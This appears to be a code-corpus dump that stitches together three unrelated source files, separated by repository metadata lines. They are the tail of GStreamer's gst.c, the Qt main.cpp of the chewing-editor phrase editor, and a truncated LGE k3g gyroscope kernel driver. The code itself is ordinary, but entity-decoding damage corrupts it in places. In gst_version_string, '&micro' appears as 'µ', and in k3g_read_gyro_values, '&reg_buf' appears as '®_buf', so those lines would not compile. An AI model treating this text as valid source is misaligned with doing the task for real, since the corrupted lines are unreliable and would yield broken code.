case ARG_DEBUG_NO_COLOR:
gst_debug_set_colored (FALSE);
break;
case ARG_DEBUG_DISABLE:
gst_debug_set_active (FALSE);
break;
case ARG_DEBUG_HELP:
gst_debug_help ();
exit (0);
#endif
case ARG_PLUGIN_SPEW:
break;
case ARG_PLUGIN_PATH:
#ifndef GST_DISABLE_REGISTRY
split_and_iterate (arg, G_SEARCHPATH_SEPARATOR_S, add_path_func, NULL);
#endif /* GST_DISABLE_REGISTRY */
break;
case ARG_PLUGIN_LOAD:
split_and_iterate (arg, ",", prepare_for_load_plugin_func, NULL);
break;
case ARG_SEGTRAP_DISABLE:
_gst_disable_segtrap = TRUE;
break;
case ARG_REGISTRY_UPDATE_DISABLE:
#ifndef GST_DISABLE_REGISTRY
_priv_gst_disable_registry_update = TRUE;
#endif
break;
case ARG_REGISTRY_FORK_DISABLE:
gst_registry_fork_set_enabled (FALSE);
break;
default:
g_set_error (err, G_OPTION_ERROR, G_OPTION_ERROR_UNKNOWN_OPTION,
_("Unknown option"));
return FALSE;
}
return TRUE;
}
static gboolean
parse_goption_arg (const gchar * opt,
const gchar * arg, gpointer data, GError ** err)
{
static const struct
{
const gchar *opt;
int val;
} options[] = {
{
"--gst-version", ARG_VERSION}, {
"--gst-fatal-warnings", ARG_FATAL_WARNINGS},
#ifndef GST_DISABLE_GST_DEBUG
{
"--gst-debug-level", ARG_DEBUG_LEVEL}, {
"--gst-debug", ARG_DEBUG}, {
"--gst-debug-disable", ARG_DEBUG_DISABLE}, {
"--gst-debug-no-color", ARG_DEBUG_NO_COLOR}, {
"--gst-debug-help", ARG_DEBUG_HELP},
#endif
{
"--gst-plugin-spew", ARG_PLUGIN_SPEW}, {
"--gst-plugin-path", ARG_PLUGIN_PATH}, {
"--gst-plugin-load", ARG_PLUGIN_LOAD}, {
"--gst-disable-segtrap", ARG_SEGTRAP_DISABLE}, {
"--gst-disable-registry-update", ARG_REGISTRY_UPDATE_DISABLE}, {
"--gst-disable-registry-fork", ARG_REGISTRY_FORK_DISABLE}, {
NULL}
};
gint val = 0, n;
for (n = 0; options[n].opt; n++) {
if (!strcmp (opt, options[n].opt)) {
val = options[n].val;
break;
}
}
return parse_one_option (val, arg, err);
}
#endif
/**
* gst_deinit:
*
* Clean up any resources created by GStreamer in gst_init().
*
* It is normally not needed to call this function in a normal application
* as the resources will automatically be freed when the program terminates.
* This function is therefore mostly used by testsuites and other memory
* profiling tools.
*
* After this call GStreamer (including this method) should not be used anymore.
*/
void
gst_deinit (void)
{
GstClock *clock;
GST_INFO ("deinitializing GStreamer");
if (gst_deinitialized) {
GST_DEBUG ("already deinitialized");
return;
}
g_slist_foreach (_priv_gst_preload_plugins, (GFunc) g_free, NULL);
g_slist_free (_priv_gst_preload_plugins);
_priv_gst_preload_plugins = NULL;
#ifndef GST_DISABLE_REGISTRY
g_list_foreach (_priv_gst_plugin_paths, (GFunc) g_free, NULL);
g_list_free (_priv_gst_plugin_paths);
_priv_gst_plugin_paths = NULL;
#endif
clock = gst_system_clock_obtain ();
gst_object_unref (clock);
gst_object_unref (clock);
_priv_gst_registry_cleanup ();
g_type_class_unref (g_type_class_peek (gst_object_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_get_type ()));
g_type_class_unref (g_type_class_peek (gst_element_factory_get_type ()));
g_type_class_unref (g_type_class_peek (gst_element_get_type ()));
g_type_class_unref (g_type_class_peek (gst_type_find_factory_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bin_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bus_get_type ()));
g_type_class_unref (g_type_class_peek (gst_task_get_type ()));
g_type_class_unref (g_type_class_peek (gst_index_factory_get_type ()));
g_type_class_unref (g_type_class_peek (gst_object_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bin_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffer_flag_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffer_copy_flags_get_type ()));
#ifndef GSTREAMER_LITE
g_type_class_unref (g_type_class_peek (gst_buffer_list_item_get_type ()));
#endif // GSTREAMER_LITE
g_type_class_unref (g_type_class_peek (gst_bus_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bus_sync_reply_get_type ()));
g_type_class_unref (g_type_class_peek (gst_caps_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_entry_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_graph_details_get_type ()));
g_type_class_unref (g_type_class_peek (gst_state_get_type ()));
g_type_class_unref (g_type_class_peek (gst_state_change_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_state_change_get_type ()));
g_type_class_unref (g_type_class_peek (gst_element_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_core_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_library_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_plugin_dependency_flags_get_type
()));
g_type_class_unref (g_type_class_peek (gst_parse_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_resource_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_search_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_stream_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_stream_status_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_structure_change_type_get_type
()));
g_type_class_unref (g_type_class_peek (gst_event_type_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_event_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_seek_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_seek_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_qos_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_format_get_type ()));
g_type_class_unref (g_type_class_peek (gst_index_certainty_get_type ()));
g_type_class_unref (g_type_class_peek (gst_index_entry_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_index_lookup_method_get_type ()));
g_type_class_unref (g_type_class_peek (gst_assoc_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_index_resolver_method_get_type
()));
g_type_class_unref (g_type_class_peek (gst_index_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_level_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_color_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_iterator_result_get_type ()));
g_type_class_unref (g_type_class_peek (gst_iterator_item_get_type ()));
g_type_class_unref (g_type_class_peek (gst_message_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_mini_object_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_link_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_link_check_get_type ()));
g_type_class_unref (g_type_class_peek (gst_flow_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_activate_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_direction_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_presence_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_template_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pipeline_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_plugin_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_plugin_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_rank_get_type ()));
g_type_class_unref (g_type_class_peek (gst_query_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffering_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_tag_merge_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_tag_flag_get_type ()));
g_type_class_unref (g_type_class_peek (gst_task_state_get_type ()));
g_type_class_unref (g_type_class_peek (gst_alloc_trace_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_type_find_probability_get_type
()));
g_type_class_unref (g_type_class_peek (gst_uri_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_parse_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_param_spec_fraction_get_type ()));
g_type_class_unref (g_type_class_peek (gst_progress_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_caps_intersect_mode_get_type ()));
gst_deinitialized = TRUE;
GST_INFO ("deinitialized GStreamer");
}
/**
* gst_version:
* @major: (out): pointer to a guint to store the major version number
* @minor: (out): pointer to a guint to store the minor version number
* @micro: (out): pointer to a guint to store the micro version number
* @nano: (out): pointer to a guint to store the nano version number
*
* Gets the version number of the GStreamer library.
*/
void
gst_version (guint * major, guint * minor, guint * micro, guint * nano)
{
g_return_if_fail (major);
g_return_if_fail (minor);
g_return_if_fail (micro);
g_return_if_fail (nano);
*major = GST_VERSION_MAJOR;
*minor = GST_VERSION_MINOR;
*micro = GST_VERSION_MICRO;
*nano = GST_VERSION_NANO;
}
/**
* gst_version_string:
*
* This function returns a string that is useful for describing this version
* of GStreamer to the outside world: user agent strings, logging, ...
*
* Returns: (transfer full): a newly allocated string describing this version
* of GStreamer.
*/
gchar *
gst_version_string (void)
{
guint major, minor, micro, nano;
gst_version (&major, &minor, µ, &nano);
if (nano == 0)
return g_strdup_printf ("GStreamer %d.%d.%d", major, minor, micro);
else if (nano == 1)
return g_strdup_printf ("GStreamer %d.%d.%d (GIT)", major, minor, micro);
else
return g_strdup_printf ("GStreamer %d.%d.%d (prerelease)", major, minor,
micro);
}
/**
* gst_segtrap_is_enabled:
*
* Some functions in the GStreamer core might install a custom SIGSEGV handler
* to better catch and report errors to the application. Currently this feature
* is enabled by default when loading plugins.
*
* Applications might want to disable this behaviour with the
* gst_segtrap_set_enabled() function. This is typically done if the application
* wants to install its own handler without GStreamer interfering.
*
* Returns: %TRUE if GStreamer is allowed to install a custom SIGSEGV handler.
*
* Since: 0.10.10
*/
gboolean
gst_segtrap_is_enabled (void)
{
/* yeps, it's enabled when it's not disabled */
return !_gst_disable_segtrap;
}
/**
* gst_segtrap_set_enabled:
* @enabled: whether a custom SIGSEGV handler should be installed.
*
* Applications might want to disable/enable the SIGSEGV handling of
* the GStreamer core. See gst_segtrap_is_enabled() for more information.
*
* Since: 0.10.10
*/
void
gst_segtrap_set_enabled (gboolean enabled)
{
_gst_disable_segtrap = !enabled;
}
| gpl-2.0 |
jeffreyhc/chewing-editor | src/main.cpp | 4 | 5330 | /*
* chewing-editor: Chewing userphrase editor
* Copyright (C) 2014 Chewing Development Team
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include "config.h"
#include <QApplication>
#include <QDebug>
#include <QLibraryInfo>
#include <QTranslator>
#ifdef _MSC_VER
#include <QtPlugin>
Q_IMPORT_PLUGIN(QWindowsIntegrationPlugin)
#endif
#include "ChewingEditor.h"
void messageHandlerHelper(QtMsgType type, const QMessageLogContext& context, const QString& message, QtMsgType level)
{
if (type < level) {
return;
}
auto msg = message.toUtf8();
auto file = QFileInfo{context.file}.fileName().toUtf8();
switch(type) {
case QtDebugMsg:
fprintf(stdout, "Debug: %s (%s %s:%d)\n", msg.constData(), context.function, file.constData(), context.line);
break;
case QtWarningMsg:
fprintf(stderr, "Warning: %s (%s %s:%d)\n", msg.constData(), context.function, file.constData(), context.line);
break;
case QtCriticalMsg:
fprintf(stderr, "Critical: %s (%s %s:%d)\n", msg.constData(), context.function, file.constData(), context.line);
break;
case QtFatalMsg:
fprintf(stderr, "Fatal: %s (%s %s:%d)\n", msg.constData(), context.function, file.constData(), context.line);
abort();
break;
default:
break;
}
}
void emptyMessageHandler(QtMsgType type, const QMessageLogContext& context, const QString& message)
{
messageHandlerHelper(type, context, message, QtWarningMsg);
}
void debugMessageHandler(QtMsgType type, const QMessageLogContext& context, const QString& message)
{
messageHandlerHelper(type, context, message, QtDebugMsg);
}
void loadTranslation(QApplication &app, QTranslator &qtTranslator, QTranslator &chewingTranslator)
{
QString qtFileName{"qt_" + QLocale::system().name()};
QString qtDirectory{QLibraryInfo::location(QLibraryInfo::TranslationsPath)};
bool qtLoaded = qtTranslator.load(qtFileName, qtDirectory);
qDebug() << "Load" << qtFileName << qtDirectory << qtLoaded;
app.installTranslator(&qtTranslator);
QString chewingFileName{":/" PROJECT_NAME "_" + QLocale::system().name()};
bool chewingLoaded = chewingTranslator.load(chewingFileName);
qDebug() << "Load" << chewingFileName << chewingLoaded;
app.installTranslator(&chewingTranslator);
}
void printVersion()
{
QString msg{QCoreApplication::translate("main", "%1\n")
.arg(PROJECT_VERSION)};
printf("%s", msg.toUtf8().constData());
}
void printArg(const QString &arg, const QString &description)
{
printf("%s\n\t%s\n\n", arg.toUtf8().constData(), description.toUtf8().constData());
}
void printHelp(const QString &name)
{
QString description{QCoreApplication::translate("main",
"chewing-editor is a cross platform chewing user phrase editor written "
"in Qt5. It provides a user friendly GUI to manage user phrase. With it,"
" user can customize user phrase to enhance chewing input performance.")};
printf("%s\n\n", description.toUtf8().constData());
printArg(
QCoreApplication::translate("main", "-d, --debug"),
QCoreApplication::translate("main", "Enable debug message."));
printArg(
QCoreApplication::translate("main", "-v, --version"),
QCoreApplication::translate("main", "Print program version."));
printArg(
QCoreApplication::translate("main", "-h, --help"),
QCoreApplication::translate("main", "Print help message."));
}
void printUnknownArgs(const QString &unknown)
{
printf("Unknown options: %s\n", unknown.toUtf8().constData());
}
void readArgument(QApplication &app)
{
auto args = QCoreApplication::arguments();
auto name = QFileInfo{args.at(0)}.fileName();
for (int i = 1; i < args.size(); ++i) {
auto arg = args.at(i);
if (arg.compare("-d") == 0 || arg.compare("--debug") == 0) {
qInstallMessageHandler(debugMessageHandler);
} else if (arg.compare("-v") == 0 || arg.compare("--version") == 0) {
printVersion();
exit(0);
} else if (arg.compare("-h") == 0 || arg.compare("--help") == 0) {
printHelp(name);
exit(0);
} else {
printUnknownArgs(arg);
printHelp(name);
exit(1);
}
}
}
int main(int argc, char *argv[])
{
qInstallMessageHandler(emptyMessageHandler);
QApplication app{argc, argv};
QTranslator qtTranslator;
QTranslator chewingTranslator;
loadTranslation(app, qtTranslator, chewingTranslator);
readArgument(app);
ChewingEditor w;
w.show();
return app.exec();
}
| gpl-2.0 |
sxwzhw/iproj | lge/com_device/input/k3g.c | 4 | 38869 | /*
* Copyright (C) 2011 LGE, Inc.
*
* * This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/i2c.h>
#include <linux/uaccess.h>
#include <linux/poll.h>
#include <linux/slab.h>
#include <linux/input.h>
#include <linux/interrupt.h>
#include <linux/miscdevice.h>
#include <asm/div64.h>
#include <linux/delay.h>
#include <board_lge.h>
#define FILE_OPS
/* k3g chip id */
#define DEVICE_ID 0xD3
/* k3g gyroscope registers */
#define WHO_AM_I 0x0F
#define CTRL_REG1 0x20 /* power control reg */
#define CTRL_REG2 0x21 /* power control reg */
#define CTRL_REG3 0x22 /* power control reg */
#define CTRL_REG4 0x23 /* interrupt control reg */
#define CTRL_REG5 0x24 /* interrupt control reg */
#define OUT_TEMP 0x26 /* Temperature data */
#define STATUS_REG 0x27
#define AXISDATA_REG 0x28
#define OUT_Y_L 0x2A
#define FIFO_CTRL_REG 0x2E
#define FIFO_SRC_REG 0x2F
#define PM_OFF 0x00
#define PM_NORMAL 0x08
#define ENABLE_ALL_AXES 0x07
#define BYPASS_MODE 0x00
#define FIFO_MODE 0x20
#define FIFO_EMPTY 0x20
#define FSS_MASK 0x1F
#define ODR_MASK 0xF0
#define ODR105_BW12_5 0x00 /* ODR = 105Hz; BW = 12.5Hz */
#define ODR105_BW25 0x10 /* ODR = 105Hz; BW = 25Hz */
#define ODR210_BW12_5 0x40 /* ODR = 210Hz; BW = 12.5Hz */
#define ODR210_BW25 0x50 /* ODR = 210Hz; BW = 25Hz */
#define ODR210_BW50 0x60 /* ODR = 210Hz; BW = 50Hz */
#define ODR210_BW70 0x70 /* ODR = 210Hz; BW = 70Hz */
#define ODR420_BW20 0x80 /* ODR = 420Hz; BW = 20Hz */
#define ODR420_BW25 0x90 /* ODR = 420Hz; BW = 25Hz */
#define ODR420_BW50 0xA0 /* ODR = 420Hz; BW = 50Hz */
#define ODR420_BW110 0xB0 /* ODR = 420Hz; BW = 110Hz */
#define ODR840_BW30 0xC0 /* ODR = 840Hz; BW = 30Hz */
#define ODR840_BW35 0xD0 /* ODR = 840Hz; BW = 35Hz */
#define ODR840_BW50 0xE0 /* ODR = 840Hz; BW = 50Hz */
#define ODR840_BW110 0xF0 /* ODR = 840Hz; BW = 110Hz */
#define MIN_ST 175
#define MAX_ST 875
#define AC (1 << 7) /* register auto-increment bit */
#define MAX_ENTRY 1
#define MAX_DELAY (MAX_ENTRY * 9523809LL)
#define SELF_TEST_ENABLED
#ifdef SELF_TEST_ENABLED
#define TAG_ST "k3g_self_test"
#define ZYXDA_MASK 0x08
#define OUT_X_L 0x28 /* X-axis acceleration data */
#define OUT_X_H 0x29
#define OUT_Y_H 0x2B
#define OUT_Z_L 0x2C /* Z-axis acceleration data */
#define OUT_Z_H 0x2D
#define SENSITIVITY 70 /*70 for 2000dps, 17.50 for 500dps, 8.75dps for 250dps */
#define MIN_ST_X 175
#define MAX_ST_X 875
#define MIN_ST_Y MIN_ST_X
#define MAX_ST_Y MAX_ST_X
#define MIN_ST_Z MIN_ST_X
#define MAX_ST_Z MAX_ST_X
#endif
#define DRV_NAME "k3g"
/* LGE Debug mask value
* usage: echo [mask_value] > /sys/module/k3dh/parameters/debug_mask
* All : 127
* No msg : 0
* default : 2
*/
enum {
DEBUG_ERR_CHECK = 1U << 0,
DEBUG_USER_ERROR = 1U << 1,
DEBUG_FUNC_TRACE = 1U << 2,
DEBUG_DEV_STATUS = 1U << 3,
DEBUG_DEV_DEBOUNCE = 1U << 4,
DEBUG_GEN_INFO = 1U << 5,
DEBUG_INTR_INFO = 1U << 6,
DEBUG_DEBUG_SYSFS = 1U << 7,
};
static unsigned int debug_mask = DEBUG_USER_ERROR;
module_param_named(debug_mask, debug_mask, int,
S_IRUGO | S_IWUSR | S_IWGRP);
/* default register setting for device init */
static const char default_ctrl_regs[] = {
0x3F, /* 105HZ, PM-normal, xyz enable */
0x00, /* normal mode */
0x04, /* fifo wtm interrupt on */
0xA0, /* block data update, 2000d/s */
0x40, /* fifo enable */
};
static const struct odr_delay {
u8 odr; /* odr reg setting */
u32 delay_ns; /* odr in ns */
} odr_delay_table[] = {
{ ODR840_BW110, 1190476LL }, /* 840Hz */
{ ODR420_BW110, 2380952LL }, /* 420Hz */
{ ODR210_BW70, 4761904LL }, /* 210Hz */
{ ODR105_BW25, 9523809LL }, /* 105Hz */
};
/*
* K3G gyroscope data
* brief structure containing gyroscope values for yaw, pitch and roll in
* signed short
*/
struct k3g_t {
s16 x;
s16 y;
s16 z;
};
struct k3g_data {
struct i2c_client *client;
struct input_dev *input_dev;
struct mutex lock;
struct workqueue_struct *k3g_wq;
struct work_struct work;
struct hrtimer timer;
bool enable;
bool drop_next_event;
bool interruptible; /* interrupt or polling? */
int entries; /* number of fifo entries */
u8 ctrl_regs[5]; /* saving register settings */
u32 time_to_read; /* time needed to read one entry */
ktime_t polling_delay; /* polling time for timer */
};
static struct i2c_client *k3g_i2c_client = NULL;
#ifdef FILE_OPS
#define K3G_IOCTL_BASE 80
/** The following define the IOCTL command values via the ioctl macros */
#define K3G_IOCTL_READ_DATA_XYZ _IOW(K3G_IOCTL_BASE, 0, int)
static int k3g_gyro_data[3];
#endif
static u32 report_cnt = 0;
static int k3g_read_fifo_status(struct k3g_data *k3g_data)
{
int fifo_status;
fifo_status = i2c_smbus_read_byte_data(k3g_data->client, FIFO_SRC_REG);
if(DEBUG_DEV_STATUS & debug_mask || fifo_status < k3g_data->entries)
printk(KERN_ERR "[k3g] #### fifo_status=%d, entries=%d\n", fifo_status, k3g_data->entries);
if (fifo_status < 0) {
pr_err("%s: failed to read fifo source register\n", __func__);
return fifo_status;
}
return (fifo_status & FSS_MASK) + !(fifo_status & FIFO_EMPTY);
}
static int k3g_restart_fifo(struct k3g_data *k3g_data)
{
int res = 0;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
res = i2c_smbus_write_byte_data(k3g_data->client,
FIFO_CTRL_REG, BYPASS_MODE);
if (res < 0) {
pr_err("%s : failed to set bypass_mode\n", __func__);
return res;
}
res = i2c_smbus_write_byte_data(k3g_data->client,
FIFO_CTRL_REG, FIFO_MODE | (k3g_data->entries - 1));
if (res < 0)
pr_err("%s : failed to set fifo_mode\n", __func__);
return res;
}
static void set_polling_delay(struct k3g_data *k3g_data, int res)
{
s64 delay_ns;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
delay_ns = k3g_data->entries + 1 - res;
if (delay_ns < 0)
delay_ns = 0;
delay_ns = delay_ns * k3g_data->time_to_read;
k3g_data->polling_delay = ns_to_ktime(delay_ns);
}
/* gyroscope data readout */
static int k3g_read_gyro_values(struct i2c_client *client,
struct k3g_t *data, int total_read)
{
int err;
struct i2c_msg msg[2];
u8 reg_buf;
int len = sizeof(*data) * (total_read ? (total_read - 1) : 1);
u8 gyro_data[sizeof(struct k3g_t) * 32];
struct k3g_platform_data *pdata;
s16 tmp_xyz[3];
pdata = client->dev.platform_data;
if(pdata == NULL)
{
dev_err(&client->dev, "failed to read platform data\n");
err = -ENODEV;
return err;
}
msg[0].addr = client->addr;
msg[0].buf = ®_buf;
msg[0].flags = 0;
msg[0].len = 1;
msg[1].addr = client->addr;
msg[1].flags = I2C_M_RD;
msg[1].buf = gyro_data;
if (total_read > 1) {
reg_buf = AXISDATA_REG | AC;
msg[1].len = len;
err = i2c_transfer(client->adapter, msg, 2);
if (err != 2)
return (err < 0) ? err : -EIO;
}
reg_buf = AXISDATA_REG;
msg[1].len = 1;
err = i2c_transfer(client->adapter, msg, 2);
if (err != 2)
return (err < 0) ? err : -EIO;
reg_buf = OUT_Y_L | AC;
msg[1].len = sizeof(*data);
err = i2c_transfer(client->adapter, msg, 2);
if (err != 2)
return (err < 0) ? err : -EIO;
tmp_xyz[1] = (gyro_data[1] << 8) | gyro_data[0];
tmp_xyz[2] = (gyro_data[3] << 8) | gyro_data[2];
tmp_xyz[0] = (gyro_data[5] << 8) | gyro_data[4];
data->y = (pdata->negate_y) ? (-tmp_xyz[pdata->axis_map_y]) : (tmp_xyz[pdata->axis_map_y]);
data->z = (pdata->negate_z) ? (-tmp_xyz[pdata->axis_map_z]) : (tmp_xyz[pdata->axis_map_z]);
data->x = (pdata->negate_x) ? (-tmp_xyz[pdata->axis_map_x]) : (tmp_xyz[pdata->axis_map_x]);
return 0;
}
static int k3g_report_gyro_values(struct k3g_data *k3g_data)
{
int res;
struct k3g_t data;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
res = k3g_read_gyro_values(k3g_data->client, &data,
k3g_data->entries + k3g_data->drop_next_event);
if (res < 0)
return res;
res = k3g_read_fifo_status(k3g_data);
if(DEBUG_DEV_STATUS& debug_mask)
printk(KERN_INFO "[k3g] read_fifo_status(%d)\n", res);
k3g_data->drop_next_event = !res;
if(DEBUG_DEV_STATUS& debug_mask)
printk(KERN_INFO "[k3g] entries=%d\n", k3g_data->entries);
if (res >= 31 - k3g_data->entries) {
/* reset fifo to start again - data isn't trustworthy,
* our locked read might not have worked and we
* could have done i2c read in mid register update
*/
if(DEBUG_DEV_STATUS& debug_mask)
printk(KERN_INFO "[k3g] call restart_fifo, entries=%d\n", k3g_data->entries);
return k3g_restart_fifo(k3g_data);
}
#ifndef CONFIG_LGE_SENSOR_FUSION
input_report_rel(k3g_data->input_dev, REL_RX, data.x);
input_report_rel(k3g_data->input_dev, REL_RY, data.y);
input_report_rel(k3g_data->input_dev, REL_RZ, data.z);
input_sync(k3g_data->input_dev);
#else
k3g_gyro_data[0] = (int) data.x;
k3g_gyro_data[1] = (int) data.y;
k3g_gyro_data[2] = (int) data.z;
#endif
if(DEBUG_DEV_DEBOUNCE & debug_mask)
printk(KERN_INFO "%s: [k3g] x(%d), y(%d), z(%d)\n", __func__, data.x, data.y, data.z);
report_cnt++;
return res;
}
static enum hrtimer_restart k3g_timer_func(struct hrtimer *timer)
{
struct k3g_data *k3g_data = container_of(timer, struct k3g_data, timer);
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
queue_work(k3g_data->k3g_wq, &k3g_data->work);
return HRTIMER_NORESTART;
}
static void k3g_work_func(struct work_struct *work)
{
int res;
struct k3g_data *k3g_data = container_of(work, struct k3g_data, work);
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
if(k3g_data->enable == 0)
{
return;
}
do {
res = k3g_read_fifo_status(k3g_data);
if (res < 0)
return;
if (res < k3g_data->entries) {
pr_warn("%s: fifo entries are less than we want\n",
__func__);
goto timer_set;
}
res = k3g_report_gyro_values(k3g_data);
if (res < 0)
return;
timer_set:
set_polling_delay(k3g_data, res);
} while (!ktime_to_ns(k3g_data->polling_delay));
hrtimer_start(&k3g_data->timer,
k3g_data->polling_delay, HRTIMER_MODE_REL);
}
static irqreturn_t k3g_interrupt_thread(int irq, void *k3g_data_p)
{
int res;
struct k3g_data *k3g_data = k3g_data_p;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
res = k3g_report_gyro_values(k3g_data);
if (res < 0)
{
pr_err("%s: failed to report gyro values\n", __func__);
}
return IRQ_HANDLED;
}
static ssize_t k3g_show_enable(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct k3g_data *k3g_data = dev_get_drvdata(dev);
if(DEBUG_DEBUG_SYSFS & debug_mask)
printk(KERN_INFO "%s: enable(%d)\n", __func__, k3g_data->enable);
return sprintf(buf, "%d\n", k3g_data->enable);
}
static ssize_t k3g_set_enable(struct device *dev,
struct device_attribute *attr, const char *buf, size_t size)
{
int err = 0;
struct k3g_platform_data *pdata;
bool new_enable;
struct k3g_data *k3g_data = dev_get_drvdata(dev);
struct i2c_client *client = to_i2c_client(dev);
pdata = k3g_i2c_client->dev.platform_data;
if(pdata == NULL)
{
dev_err(&client->dev, "failed to read platform data\n");
err = -ENODEV;
return err;
}
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d - enable %s\n", __func__, __LINE__, buf);
if (sysfs_streq(buf, "1"))
{
new_enable = true;
if(DEBUG_FUNC_TRACE & debug_mask||DEBUG_DEBUG_SYSFS & debug_mask)
printk(KERN_INFO "%s: line %d - enable\n", __func__, __LINE__);
}
else if (sysfs_streq(buf, "0"))
{
new_enable = false;
if(DEBUG_FUNC_TRACE & debug_mask||DEBUG_DEBUG_SYSFS & debug_mask)
printk(KERN_INFO "%s: line %d - disable\n", __func__, __LINE__);
}
else
{
pr_debug("%s: invalid value %d\n", __func__, *buf);
return -EINVAL;
}
if (new_enable == k3g_data->enable)
{
return size;
}
mutex_lock(&k3g_data->lock);
if (new_enable)
{
if(pdata->power_on){
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d, call power_on", __func__, __LINE__);
pdata->power_on(1<<SENSOR_TYPE_GYROSCOPE);
mdelay(1);
}
/* turning on */
err = i2c_smbus_write_i2c_block_data(k3g_data->client,
CTRL_REG1 | AC, sizeof(k3g_data->ctrl_regs),
k3g_data->ctrl_regs);
if (err < 0)
{
err = -EIO;
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d, failed turn on\n", __func__, __LINE__);
goto unlock;
}
mdelay(300);
/* reset fifo entries */
err = k3g_restart_fifo(k3g_data);
if (err < 0)
{
err = -EIO;
goto turn_off;
}
if (k3g_data->interruptible)
{
enable_irq(k3g_data->client->irq);
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d, enable interrupt\n", __func__, __LINE__);
}
else
{
set_polling_delay(k3g_data, 0);
hrtimer_start(&k3g_data->timer,
k3g_data->polling_delay, HRTIMER_MODE_REL);
if(DEBUG_FUNC_TRACE & debug_mask)
printk(KERN_INFO "%s: line %d, set_polling_delay\n", __func__, __LINE__);
}
report_cnt = 0;
}
else
{
if (k3g_data->interruptible)
{
printk(KERN_INFO "%s: line %d -disable_irq\n", __func__, __LINE__);
disable_irq(k3g_data->client->irq);
}
else
{
printk(KERN_INFO "%s: line %d - cancel timer\n", __func__, __LINE__);
hrtimer_cancel(&k3g_data->timer);
cancel_work_sync(&k3g_data->work);
flush_workqueue(k3g_data->k3g_wq);
}
/* turning off */
err = i2c_smbus_write_byte_data(k3g_data->client,
